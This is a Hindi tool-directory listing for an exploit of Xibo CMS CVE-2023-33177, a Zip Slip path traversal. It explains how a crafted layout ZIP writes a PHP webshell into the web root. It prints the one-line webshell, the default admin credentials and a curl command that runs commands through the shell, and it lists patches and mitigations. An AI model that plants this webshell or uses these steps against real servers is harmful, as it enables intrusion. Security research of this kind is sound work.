Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177 — यह एक्सप्लॉइट Xibo CMS (CVE-2023-33177) में एक **पथ ट्रैवर्सल भेद्यता** प्रदर्शित करता है जो दुर्भावनापूर्ण लेआउट आयात के माध्यम से दूरस्थ कोड निष्पादन की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/complexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcomplexusprada/xibo-cms-zip-slip-rce-exploit-cve-2023-33177

Xibo-CMS-Zip-Slip-RCE-Exploit-CVE-2023-33177

यह एक्सप्लॉइट Xibo CMS (CVE-2023-33177) में एक **पथ ट्रैवर्सल भेद्यता** प्रदर्शित करता है जो दुर्भावनापूर्ण लेआउट आयात के माध्यम से दूरस्थ कोड निष्पादन की अनुमति देता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

Xibo CMS Zip Slip RCE एक्सप्लॉइट CVE-2023-33177

यह एक्सप्लॉइट Xibo CMS (CVE-2023-33177) में एक पथ ट्रैवर्सल भेद्यता प्रदर्शित करता है जो दुर्भावनापूर्ण लेआउट आयात के माध्यम से रिमोट कोड निष्पादन (RCE) की अनुमति देता है।

भेद्यता विवरण

CVE/सलाह: CVE-2023-33177 प्रभावित संस्करण:

  • Xibo CMS 1.8.0 - 2.3.16
  • Xibo CMS 3.0.0 - 3.3.4

भेद्यता प्रकार: पथ ट्रैवर्सल (Zip Slip) प्रभाव: रिमोट कोड निष्पादन (RCE)

तकनीकी सारांश

Xibo CMS प्रमाणित उपयोगकर्ताओं को ZIP आर्काइव के माध्यम से लेआउट फ़ाइलें आयात करने की अनुमति देता है। आयात कार्यक्षमता mapping.json फ़ाइल में फ़ाइल पथों को ठीक से मान्य करने में विफल रहती है, जिससे हमलावर पथ ट्रैवर्सल अनुक्रम (../../) का उपयोग करके इच्छित लाइब्रेरी निर्देशिका के बाहर फ़ाइलें लिख सकता है।

एक्सप्लॉइट कैसे काम करता है

  1. एक मान्य Xibo लेआउट निर्यात संरचना बनाता है आवश्यक JSON फ़ाइलों के साथ
  2. mapping.json में पथ ट्रैवर्सल इंजेक्ट करता है: फ़ाइल पथ के रूप में ../../web/shell.php का उपयोग करता है
  3. ZIP संरचना में library/../../web/shell.php पर ट्रैवर्स किए गए पथ में वेबशेल रखता है
  4. Xibo बिना सत्यापन के निकालता है: /var/www/cms/web/shell.php पर हल होता है
  5. RCE प्राप्त करता है: वेबशेल वेब रूट पर सुलभ है

भेद्यता श्रृंखला

root@kitploit:~
Zip contains: library/../../web/shell.php
Xibo reads:   library/ + ../../web/shell.php (from mapping.json)
Xibo writes:  /var/www/cms/library/temp/ + ../../web/shell.php
Result:       /var/www/cms/web/shell.php ← Webshell in web root!

उपयोग

एक्सप्लॉइट जनरेट करें

root@kitploit:~
python3 create_exploit.py

यह दुर्भावनापूर्ण लेआउट पैकेज युक्त exploit.zip बनाता है।

शोषण चरण

  1. Xibo CMS तक पहुंचें और क्रेडेंशियल्स से लॉग इन करें (डिफ़ॉल्ट: xibo_admin / password)
  2. आयात पर जाएं: Design → Layouts → Import
  3. exploit.zip अपलोड करें
  4. किसी भी JSON त्रुटि को अनदेखा करें - वेबशेल पहले ही डिस्क पर लिखा जा चुका है
  5. वेबशेल के माध्यम से कमांड निष्पादित करें:
    root@kitploit:~
    curl 'http://localhost:8080/shell.php?cmd=id'
    

फ़ाइल संरचना

एक्सप्लॉइट ZIP में शामिल है:

root@kitploit:~
exploit.zip
├── layout.json          # Valid Xibo layout definition
├── playlist.json        # Empty playlist (triggers JSON import)
├── mapping.json         # Contains path traversal payload
└── library/
    └── ../../web/
        └── shell.php    # PHP webshell (gets extracted to web root)

वेबशेल कार्यक्षमता

एम्बेडेड वेबशेल न्यूनतम है:

root@kitploit:~
<?php system($_GET["cmd"]); ?>

इसे इस प्रकार एक्सेस करें: http://<target>/shell.php?cmd=<command>

शमन

पैच किए गए संस्करण:

  • Xibo CMS 2.3.17+ में अपग्रेड करें (2.x शाखा के लिए)
  • Xibo CMS 3.3.5+ में अपग्रेड करें (3.x शाखा के लिए)

शमन रणनीतियाँ:

  1. निकालने से पहले ZIP आर्काइव में सभी फ़ाइल पथों को मान्य करें
  2. .. या निरपेक्ष पथ वाले पथों को अस्वीकार करें
  3. निर्देशिका ट्रैवर्सल को रोकने वाली सुरक्षित निष्कर्षण विधियों का उपयोग करें
  4. आयात कार्यक्षमता पर उचित इनपुट सत्यापन लागू करें
  5. फ़ाइल अपलोड अनुमतियों को केवल प्रमाणित, अधिकृत उपयोगकर्ताओं तक सीमित करें

कानूनी और नैतिक सूचना

यह एक्सप्लॉइट निम्नलिखित के लिए प्रदान किया गया है:

  • शैक्षिक उद्देश्य
  • CTF प्रतियोगिताएं
  • अधिकृत सुरक्षा परीक्षण
  • रक्षात्मक सुरक्षा अनुसंधान

इस एक्सप्लॉइट का उपयोग उन सिस्टम के विरुद्ध न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है।

संदर्भ

  • सलाह: GHSA-jj27-x85q-crqv
  • Xibo CMS: https://xibo.org.uk/
  • Zip Slip भेद्यता: https://security.snyk.io/research/zip-slip-vulnerability
  • CVE-2023-33177: https://nvd.nist.gov/vuln/detail/CVE-2023-33177

लेखक

complexusprada नवंबर 2025

टूल डाउनलोड करें